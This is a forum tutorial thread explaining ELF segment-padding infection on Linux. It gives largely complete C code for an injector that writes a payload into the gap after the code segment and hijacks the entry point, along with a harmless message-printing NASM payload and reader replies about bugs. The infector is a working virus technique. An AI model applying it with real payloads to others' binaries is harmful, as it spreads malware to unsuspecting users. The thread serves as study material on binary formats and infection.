ELFun File Injector


(pico) #1

As it doesn’t look like @dtm is going to cover Linux stuff, I have written a quick and dirty version of the great PE File Infector paper from @dtm, but targeting ELF binaries, specifically under GNU/Linux systems.

The process I will describe is slightly different from the one explained in the PE counterpart, so you will get a different view of the process, and hopefully that will help you better understand how these things work. Moreover, it does not feel right to just write the same thing, even if it is targeting a different system.

So, let’s start.

Infection Technique

If you have read the “PE File Infector” paper on this site, you should already know what a code cave is. If you do not, go and read it, right now.

In the Linux world, you will find references to this technique as Segment padding infection. It is basically the same thing; I’m mentioning it just in case you want to look for further information.

The infection technique we are going to implement is as follows:

  • Find the padding area between the .text segment and the next segment in the program (that is usually .data).
  • Append the payload code to the end of the .text segment (in that padding area)
  • Patch the ELF binary to run the injected code at start up (modify the ELF entry point)
  • Patch the payload to return execution to the original ELF entry point

The technique takes advantage of the padding areas in the segments. These exist because the operating system works with page granularity. It is related to the processor’s memory management unit, but that is a bit out of scope. So, in general, there is an unused area at the end of the .text segment. The size of that area depends on the size of the code; it may not exist at all, or it may be just a couple of bytes. For that reason, this technique may not work with some programs.
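
To make the page-granularity argument a bit more concrete, here is a minimal sketch that computes how many bytes are left between the end of a segment and the end of its last page. The function name page_slack and the 4096-byte page size in the example are my own assumptions for illustration; the gap that is actually usable in a file can be smaller, because the next segment may start before the page ends.

```c
#include <stddef.h>

/* Bytes left between seg_end and the next page boundary.
   page_size is assumed to be a power of two (4096 on most x86-64 systems). */
size_t
page_slack (size_t seg_end, size_t page_size)
{
  size_t used = seg_end & (page_size - 1);   /* bytes used in the last page */

  return used ? page_size - used : 0;
}
```

For example, a code segment ending at offset 0x6fc leaves 0x904 bytes in its last 4096-byte page, while one ending exactly on a page boundary leaves nothing.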

The main advantage of this technique is that the file size and the overall ELF data structures are not modified at all (with the exception of the application entry point).

Writing an Infector

The ELF code injector is pretty straightforward. The main function is a bit long, so I will divide it into smaller functional blocks in the hope that it will be easier to follow.

You can find the whole source code on GitHub.

Opening the target ELF File

The first thing the main function does (after a quick check of the number of parameters) is to open the target ELF File. The code looks like this:

int
main (int argc, char *argv[])
{
  void        *d, *d1;
  int         target_fd, payload_fd;
  int         fsize, fsize1;

  printf ("Segment Padding Infector for 0x00sec\nby pico\n\n");
  if (argc != 3)
    {
      fprintf (stderr, "Usage:\n  %s elf_file payload\n", argv[0]);
      exit (1);
    }

  /* Open and map target ELF and payload */
  target_fd  = elfi_open_and_map (argv[1], &d, &fsize);
  payload_fd = elfi_open_and_map (argv[2], &d1, &fsize1);
  /* main continues in the snippets shown in the next sections */

OK, there is not much to say about this: the main function opens and maps both the target ELF we will inject our code into and the file holding the code to be injected. Let’s continue by looking into the elfi_open_and_map function:

int
elfi_open_and_map (char *fname, void **data, int *len)
{
  int   size;
  int   fd;

  if ((fd = open (fname, O_APPEND | O_RDWR, 0)) < 0)
    {
      perror ("open:");
      exit (1);
    }
  size = get_file_size (fd);
  if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
                     MAP_SHARED, fd, 0)) == MAP_FAILED)
    {
      perror ("mmap:");
      exit (1);
    }
  /* Print the mapped address (*data), not the address of the parameter */
  printf ("+ File mapped (%d bytes ) at %p\n", size, *data);
  *len = size;
  return fd;
}

This function does three things:

  1. It opens the file using open
  2. Then it uses a utility function called get_file_size to find out the size of the file. We need this information for the last step. The get_file_size function just calls fstat (I will not include it here as it is not really interesting)
  3. It memory maps the file. This means that we can access the file as if it were in memory (using pointers), but we are actually modifying the file on disk. So, this is a very convenient way of patching a file

The function returns the file descriptor and uses two output parameters to return the pointer to the memory mapped area (that is, the beginning of our file) and its size.
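
The get_file_size helper is not shown in this post. A minimal sketch of what it could look like, assuming it is just a thin wrapper around fstat (the return type and the -1 error convention are my guess, not necessarily what the real source does):

```c
#include <sys/types.h>
#include <sys/stat.h>

/* Return the size in bytes of the file behind fd, or -1 on error. */
long
get_file_size (int fd)
{
  struct stat st;

  if (fstat (fd, &st) < 0)
    return -1;
  return (long) st.st_size;
}
```

A caller would normally check for the -1 before handing the size to mmap.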

Getting information

Now that we have access to our files, we will store some information:

  /* Get Application Entry point */
  elf_hdr = (Elf64_Ehdr *) d;
  ep = elf_hdr->e_entry;
  printf ("+ Target Entry point: %p\n", (void*) ep);

As we said, the pointer returned by elfi_open_and_map points to the actual content of the file. For an ELF file, the first thing we find is the ELF header. Take a look at the specs to find out the information kept by this structure.

Right now, we are interested in the application entry point. That is the address where the program will start its execution. Think about it as the memory address of the main function… It is not that simple, but for our current discussion such a definition should be OK.

Finding a gap

Now we have to find a gap in the target file. We have written a function to do that, which we call from the main function:

 Elf64_Phdr  *t_text_seg = elfi_find_gap (d, fsize, &p, &len);
 Elf64_Addr   base = t_text_seg->p_vaddr;

The elfi_find_gap function will go through all the ELF segments and try to find the gap in the one that holds the code. It returns a pointer to the ELF segment structure that we will use later. It also returns the offset in the file to the gap and its size, using a couple of output parameters.

After finding the code segment, we will also store the memory address where that code will be loaded. This is usually 0x400000, but it may be different on some applications.

The elfi_find_gap function looks like this:

Elf64_Phdr *
elfi_find_gap (void *d, int fsize, int *p, int *len)
{
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) d;
  Elf64_Phdr* elf_seg, *text_seg = NULL;
  int         n_seg = elf_hdr->e_phnum;
  int         i;
  int         text_end = 0, gap = fsize;

  elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr 
                            + (unsigned int) elf_hdr->e_phoff);

  for (i = 0; i < n_seg; i++)
    {
      /* In practice 0x011 tests the PF_X (0x1) bit */
      if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
        {
          printf ("+ Found .text segment (#%d)\n", i);
          text_seg = elf_seg;
          text_end = elf_seg->p_offset + elf_seg->p_filesz;
        }
      else
        {
          if (elf_seg->p_type == PT_LOAD && 
              (elf_seg->p_offset - text_end) < gap) 
            {
              printf ("   * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
                      i, (unsigned int)elf_seg->p_offset);
              gap = elf_seg->p_offset - text_end;
            }
        }
      /* Advance to the next program header entry */
      elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg 
                                + (unsigned int) elf_hdr->e_phentsize);
    }

  *p = text_end;
  *len = gap;

  printf ("+ .text segment gap at offset 0x%x(0x%x bytes available)\n", text_end, gap);

  return text_seg;
}

Once again, we first access the ELF header to figure out where, within the file, the segment information is stored. It actually is at the offset specified by the header’s field e_phoff. With all this information, we can start checking the segments.

First we look for a segment of type PT_LOAD with execution permissions. Normally there is only one, and it is the one containing the .text section, and therefore the application code. When we find it, we store the pointer to the segment structure (to return it later) and the offset to the actual end of the section in the file.

Then we keep looking for PT_LOAD segments and we calculate the gap with respect to the current executable segment we have already found, and we store the one with the smallest gap.

This function can probably be improved a lot. Normally there are only two PT_LOAD segments and they come one after the other in the file. I was not sure if it is possible to get those segments out of order in the file (in theory it should be possible), so that is why the function is a bit complex.

Oh sure, PT_LOAD segments are those that are directly loaded from the file. Other segments like the ones containing the stack or the .bss section are not stored in the file, but the code and static data have to be there and the PT_LOAD type is the way the system knows that the data in the file has to be loaded in memory.
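
As a hedged alternative to the single loop above, here is a sketch that does the search in two passes over an array of program headers, so the order of the entries in the table does not matter. The name text_gap is mine, and the sketch assumes that e_phentsize equals sizeof (Elf64_Phdr) so the table can be indexed as a plain array; it is an illustration, not the code from the injector.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/* Return the size of the file gap that follows the first executable
   PT_LOAD segment, or -1 if there is no such segment or no PT_LOAD
   segment starts after it.  On success *gap_off gets the file offset
   where the gap begins. */
int64_t
text_gap (const Elf64_Phdr *ph, size_t n, uint64_t *gap_off)
{
  const Elf64_Phdr *text = NULL;
  uint64_t          text_end = 0, best = UINT64_MAX;
  size_t            i;

  /* Pass 1: find the executable PT_LOAD segment */
  for (i = 0; i < n; i++)
    if (ph[i].p_type == PT_LOAD && (ph[i].p_flags & PF_X))
      {
        text = &ph[i];
        text_end = ph[i].p_offset + ph[i].p_filesz;
        break;
      }
  if (text == NULL)
    return -1;

  /* Pass 2: find the closest PT_LOAD segment starting after its end */
  for (i = 0; i < n; i++)
    {
      if (ph[i].p_type != PT_LOAD || &ph[i] == text)
        continue;
      if (ph[i].p_offset >= text_end && ph[i].p_offset - text_end < best)
        best = ph[i].p_offset - text_end;
    }
  if (best == UINT64_MAX)
    return -1;

  *gap_off = text_end;
  return (int64_t) best;
}
```

Segments that are not PT_LOAD are ignored on purpose, following the explanation above that only PT_LOAD segments are loaded from the file.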

The Payload

We have to stop looking at our infector code for a sec and take a look at the payload we are going to use and how to get it into memory. We have just written a simple payload that prints a message on the console. I know that is not very impressive, but this is already becoming a somewhat long and complex howto.

So, our payload looks like this:

section .text
        global _start

_start:
        mov rax,1       ; [1] - sys_write
        mov rdi,1       ; 0 = stdin / 1 = stdout / 2 = stderr
        lea rsi,[rel msg]     ; pointer(mem address) to msg (*char[])
        mov rdx, msg_end - msg      ; msg size
        syscall         ; calls the function stored in rax

	mov rax, 0x11111111
	jmp rax

align 8
        msg     db 'This file has been infected for 0x00SEC',0x0a,0
	msg_end db 0x0

It is the classical Hello World assembler program but, just after printing the message, it jumps somewhere else. The 0x11111111 is a marker where we will have to write the original ELF entry point, to let the original application run normally.

As usual, we can compile this small program with:

nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o

And with that, we can get back to our ELF injector.

Processing the payload

You could just use some external tool to produce a hex dump of the payload code. Check @unh0lys0da’s shellcode tutorial for details. In this case, as we are playing with the ELF format, we are going to directly use the binary we have just built.

The way we compiled our payload actually produced an ELF file. If you recall the beginning of the paper, we have already opened the payload and mapped it into memory. Now we just need to find out where the actual code is, and copy it into the .text segment gap of the target program that we found before.

This is what the code below does:

  Elf64_Shdr *p_text_sec = elfi_find_section (d1, ".text");

  printf ("+ Payload .text section found at %lx (%lx bytes)\n", 
          p_text_sec->sh_offset, p_text_sec->sh_size);

  if (p_text_sec->sh_size > len)
    {
      fprintf (stderr, "- Payload too big, cannot infect file.\n");
      exit (1);
    }
  /* Copy payload in the segment padding area */
  memmove (d + p, d1 + p_text_sec->sh_offset, p_text_sec->sh_size);

First we call a function (that we will describe in a sec) to find out where the .text section is, and therefore where the payload code is. The function returns a pointer to an ELF section structure that contains all the information we need.

Then we have to check that the size of the .text section of the payload (our code) fits in the gap we previously found, and finally we just copy the payload code into the target file, right at the end of the executable segment, using the offset returned by elfi_find_gap.

Finding a Section in an ELF File

So, we have to take a look at the elfi_find_section function. Here it is:

Elf64_Shdr *
elfi_find_section (void *data, char *name)
{
  char        *sname;
  int         i;
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) data;
  Elf64_Shdr *shdr = (Elf64_Shdr *)(data + elf_hdr->e_shoff);
  /* Section header string table: it holds the section names */
  Elf64_Shdr *sh_strtab = &shdr[elf_hdr->e_shstrndx];
  const char *const sh_strtab_p = data + sh_strtab->sh_offset;

  printf ("+ %d sections in file. Looking for section '%s'\n", 
          elf_hdr->e_shnum, name);
  for (i = 0; i < elf_hdr->e_shnum; i++)
    {
      sname = (char*) (sh_strtab_p + shdr[i].sh_name);
      if (!strcmp (sname, name))  return &shdr[i];
    }
  return NULL;
}

In order to find a section by name, we have to access the section header string table of the ELF file (the section whose index is stored in the header field e_shstrndx). That table stores the section names as NUL-terminated, human readable strings. Other strings, such as symbol and library names, live in separate string tables.

The section list in the ELF file stores each section name as an offset into that string table. So, despite all that pointer gymnastics, the function is just looping through the section list, retrieving the name using the information there, and comparing that string with the passed parameter.

Just open the ELF spec, and start following the data structures. It’s just tedious but not difficult.
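
When following those structures in a file you do not trust, it may be worth checking that a name offset really falls inside the table that holds the section names. A minimal sketch, assuming the caller already knows where that table starts and how big it is (the helper name shstr_name is hypothetical, it is not part of the injector):

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Return the NUL-terminated name stored at offset sh_name in the string
   table, or NULL if the offset is out of range or the string is not
   terminated inside the table. */
const char *
shstr_name (const char *strtab, size_t strtab_size, uint32_t sh_name)
{
  if (sh_name >= strtab_size)
    return NULL;
  if (memchr (strtab + sh_name, '\0', strtab_size - sh_name) == NULL)
    return NULL;
  return strtab + sh_name;
}
```

With a table containing "\0.text\0.data", offset 1 gives ".text" and offset 7 gives ".data".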

Patching Entry Points

So, we are almost done. Now we just need to patch the entry points. This is done with the following code in the main function:

  /* Patch return address */
  elfi_mem_subst (d+p, p_text_sec->sh_size, 0x11111111, (long)ep);

  /* Patch entry point */
  elf_hdr->e_entry = (Elf64_Addr) (base + p);

  /* Close files and actually update target file */
  close (payload_fd);
  close (target_fd);

The elfi_mem_subst function just looks for the sequence 0x11111111 (do you remember it in our payload?), and substitutes it with the original ELF entry point. This will start the target application just after running our payload.

Then, for the main entry point, we just use our ELF header pointer and write there the address of our payload, so it gets run when the application is executed. We calculate the payload address as the base address we got from the executable segment plus the offset to the segment gap we found at the beginning.
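
Adding the base address and the file offset gives the right result when the executable segment starts at file offset 0. As a hedged sketch of the more general computation, assuming the segment may start at a non-zero p_offset (the helper name offset_to_vaddr is mine, not part of the injector):

```c
#include <elf.h>
#include <stdint.h>

/* Virtual address at which the byte at file offset file_off, located
   inside segment seg, ends up once the segment is loaded. */
uint64_t
offset_to_vaddr (const Elf64_Phdr *seg, uint64_t file_off)
{
  return seg->p_vaddr + (file_off - seg->p_offset);
}
```

For a segment with p_vaddr 0x400000 and p_offset 0, file offset 0x6fc maps to 0x4006fc, which is the same value the simple addition produces.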

Once we are done, we just close the files to make sure that all the changes we made in the memory mapped area make it to the file.
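
If you prefer to make that last step explicit instead of leaving the write-back to the kernel, a small sketch using msync and munmap could look like this. The function name elfi_flush_and_unmap is an assumption of mine; the injector described here does not have it.

```c
#include <stddef.h>
#include <sys/mman.h>

/* Write any modified pages back to the file, then drop the mapping.
   Returns 0 on success, -1 on error (errno is set by msync or munmap). */
int
elfi_flush_and_unmap (void *d, size_t len)
{
  if (msync (d, len, MS_SYNC) < 0)
    return -1;
  return munmap (d, len);
}
```

It would be called with the pointer and size returned by elfi_open_and_map, right before closing the file descriptor.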

Just for completeness, let’s take a look at elfi_mem_subst:

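int
elfi_mem_subst (void *m, int len, long pat, long val)
{
  unsigned char *p = (unsigned char*)m;
  long v, r;   /* r must be a long, otherwise the XOR result is truncated */
  int i;

  /* Stop early enough that the 8-byte read stays inside the buffer */
  for (i = 0; i + (int) sizeof (long) <= len; i++)
    {
      v = *((long*)(p+i));
      r = v ^ pat;

      if (r == 0) 
        {
          printf ("+ Pattern %lx found at offset %d -> %lx\n", pat, i, val);
          *((long*)(p+i)) = val;
          return 0;
        }
    }
  return -1;
}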

Nothing special, we just scan the payload byte by byte to find our mark. When found, it is substituted by the value passed as a parameter (in this case the original entry point).
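
A slightly more defensive variant of the same idea, as a sketch: it copies the bytes with memcpy instead of casting the pointer, which avoids unaligned accesses, and it returns the offset of the match. The name mem_subst64 is mine. It assumes a little-endian host and that the marker is stored in the payload as a full 8-byte immediate (0x11111111 followed by four zero bytes); if the assembler picks a shorter encoding, an 8-byte compare like this one will not find it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Replace the first 8-byte occurrence of pat in m[0..len) with val.
   Returns the offset of the match, or -1 if the pattern is not present. */
long
mem_subst64 (unsigned char *m, size_t len, uint64_t pat, uint64_t val)
{
  size_t   i;
  uint64_t v;

  for (i = 0; i + sizeof v <= len; i++)
    {
      memcpy (&v, m + i, sizeof v);        /* safe unaligned read */
      if (v == pat)
        {
          memcpy (m + i, &val, sizeof val);
          return (long) i;
        }
    }
  return -1;
}
```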

Using the injector

So, compile the application and generate your payload:

$ make elf_injector
$ nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o

And then just start injecting your payload:

$ ./elf_injector xeyes payload

I have tried the program with some binaries on my system. I have to say that it failed with some, and I do not know the reason yet. Some of the ones I successfully used were: xeyes, vim, lynx…

It failed with evince, for instance… So, lucky you, it is not perfect, and you have something to look at and play with :)… Have ELFun!

Final Words

If you are planning to look further into this topic (you should, it is really interesting), it would be a good idea to install readelf to easily inspect your ELF files.

Also make sure that xxd is available to do hex dumps and check that you are dumping data in the right place.

I have written this pretty quickly, so it may not be the most comprehensive howto and some parts may be hard to follow. Let me know in the comments if something needs improvement.

Happy Hacking!


Woah, why did I never try this? Basically this is just Linux malware, right?
This is so awesome, thanks for opening my eyes <3
Fuck Windows Internals, I’m gonna focus on this ^^.
Amazing article!


(Command-Line Ninja) #3

Such an amazing article man! Keep it up!!!

(oaktree) #4

I’ll be reading this a few times – to grasp it.

BTW: There’s a bug in your first snippet: You passed fsize twice, rather than passing fsize1 the second time.

(pico) #5

I guess so. My main interest in this topic was to patch or update applications when the source code is not available, or when dealing with legacy systems.

But yes… a binary patching system and malware work pretty much the same way :wink:


(pico) #6

Thanks for the catch on the code. It’s fixed!


Ok so I figured out what every line of code does and I’m stunned.
This is amazing man so many props.
mmaping, typecasting as Elf header struct, I never thought something like that would be possible.
Thanks for keeping the fun in my pursuit in gaining knowledge :slight_smile:
tbh I had a small crisis of faith in my pursuit lately
Few questions though:

   if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
                      MAP_SHARED, fd, 0)) == MAP_FAILED)
     {
       perror ("mmap:");
       exit (1);
     }

Here you mmap the file to *data.
Which you then here:

  /* Get Application Entry point */
  elf_hdr = (Elf64_Ehdr *) d;
  ep = elf_hdr->e_entry;
  printf ("+ Target Entry point: %p\n", (void*) ep);

typecast as Elf64_Ehdr

So does this work, because mmap begins from the start of the file, where the magic happens?
Because that realization is just mindblowing.

Alright I’m gonna let all of this sink in and try to find why it doesnt work sometimes.

(pico) #8

Yes, you will get the same if you open the file normally and just read the first bytes into an Elf64_Ehdr variable.

I’m looking forward to your findings. It looks to be related to PIE code… but it may just be something stupid…


I’ll also work on 32bit support, might this be a cause for the issue?

(pico) #10

Then you need to use the 32-bit structures… there are some differences between both… basically change 64 to 32 in all the data structures (e.g. Elf64_Ehdr -> Elf32_Ehdr).


That’s one way, the thing is, I want to let the program check what architecture it is, by typecasting data as an array first and see what arr[4]'s value is (e_ident[EI_CLASS]). So that it would work on both 32 bit and 64 bit.
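
A minimal sketch of that runtime check, assuming the first bytes of the mapped target are available as a byte buffer (the function name elf_class_bits is hypothetical; the constants come from elf.h):

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Return 64 or 32 depending on e_ident[EI_CLASS], or -1 if the buffer
   does not start with a valid ELF identification. */
int
elf_class_bits (const unsigned char *data, size_t len)
{
  if (len < EI_NIDENT || memcmp (data, ELFMAG, SELFMAG) != 0)
    return -1;
  switch (data[EI_CLASS])
    {
    case ELFCLASS64: return 64;
    case ELFCLASS32: return 32;
    default:         return -1;
    }
}
```

The result could then be used to choose between the Elf32_* and Elf64_* structures before casting the mapped data.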

(oaktree) #12

Why not use #ifndef stuff?


Because it would be determined at runtime; it’s not about the injector, it’s about the target file.
@0x00pf Would it be possible to infect 64 bit files, if I’d compile this injector as a 32 bit ELF binary?
I maybe found some bugs:

  elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr 
			    + (unsigned int) elf_hdr->e_phoff);

Here (unsigned int) is a 32 bit value, could it be possible that e_phoff exceeds 0xffffffff ?

also, shouldn’t:

if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)

be:

if (elf_seg->p_type == PT_LOAD && !(elf_seg->p_flags ^ 0x5))

PF_X = 0x1 PF_W = 0x2 PF_R = 0x4
& 0x11, would only hold true for PF_X. Or is .text always the first executable segment it will find?

And I have a question about the following:

  for (i = 0; i < n_seg; i++)
    {
      if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
        {
          printf ("+ Found .text segment (#%d)\n", i);
          text_seg = elf_seg;
          text_end = elf_seg->p_offset + elf_seg->p_filesz;
        }
      else
        {
          if (elf_seg->p_type == PT_LOAD && 
              (elf_seg->p_offset - text_end) < gap) 
            {
              printf ("   * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
                      i, (unsigned int)elf_seg->p_offset);
              gap = elf_seg->p_offset - text_end;
            }
        }
      elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg 
                                + (unsigned int) elf_hdr->e_phentsize);
    }

At the end of each iteration, the elf_seg pointer gets incremented.
that means it points to the struct Elf64_Phdr, + some additional.
This seems counterintuitive to me because if:

| member0 | ... | memberx | ... | member n | ... | member n+x | ...
   └─strct strct->a──┘               │                   │
 after m iterations: strct───────────┘ strct->a──────────┘

So if you’d increment the pointer, wouldn’t that cause it to no longer point to the first member of the struct. And wouldn’t that cause that adressing members goes wrong?

Nvm I’m being stupid, shouldve checked the manpage properly ^^
e_phentsize This member holds the size in bytes of one entry in the file’s program header table; all entries are the same size.
So it does indeed increment the struct pointer by such an amount that it actually points to a new struct (entry) in the file
Awesome ^^

Another question (I just keep 'em coming):
Why are we looking for the smallest gap, instead of the biggest?

(pico) #14

That is indeed possible. I just chose 64bits in the post to keep it simple, but indeed, a proper program should work with both architectures… I’m looking forward to your version of the injector!!!

(pico) #15

Sure. We are just changing bytes in a file.

If you check the structure in elf.h, it is actually 16 bits.

I think you are right about this. Have you tried the modification? I will take a look later, but it looks like you are right.

Well, that code is not the best in the world. This injector always adds the code at the end of the .text segment, so the gap we are looking for in that function is the one from the end of the .text segment to the beginning of whatever other segment comes after it. As I didn’t know if the .data segment is always the next one, I just calculate the gap for every single segment in the file, and I keep the smallest, as that is the one between the .text segment and the segment that comes next.

Sorry for the poor wording of this explanation… Let me know if I manage to explain it :slight_smile:


Yes I get it :slight_smile:

About the modification, I’ll try it right now, see if it makes a difference ^^

I’ll also try to implement the 32 and 64 bit stuff.


So far I have this:

Though there are some issues ^_^'
I think there are some pointer issues.

(Command-Line Ninja) #18

Make another post and link this post!

(pico) #19

At first glance it looks good!

(0x00Jinx) #20

I got bored, so I used your code to create a Python module out of this. The code is on Pastebin. The instructions are included in the source code, in the comment at the top, along with an example.